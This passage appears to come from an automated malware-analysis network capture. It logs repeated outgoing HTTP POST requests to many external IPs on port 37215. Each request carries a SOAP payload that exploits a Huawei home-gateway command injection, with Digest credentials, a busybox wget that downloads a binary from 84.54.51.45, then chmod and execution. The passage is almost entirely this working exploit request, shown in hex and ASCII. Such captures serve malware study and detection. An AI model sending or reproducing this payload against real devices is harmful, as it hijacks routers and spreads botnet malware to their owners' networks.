                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            212192.168.2.1536024197.203.240.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177987099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            213192.168.2.1545978197.209.40.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178020000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            214192.168.2.1543890197.140.206.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178030968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            215192.168.2.1559440197.140.228.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178064108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            216192.168.2.1555552197.31.125.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178066969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            217192.168.2.1534652197.59.107.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178092957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            218192.168.2.1553570197.52.109.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178144932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            219192.168.2.1550192197.206.196.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178144932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            220192.168.2.1548202197.191.213.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178204060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            221192.168.2.1541434197.92.142.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178215027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
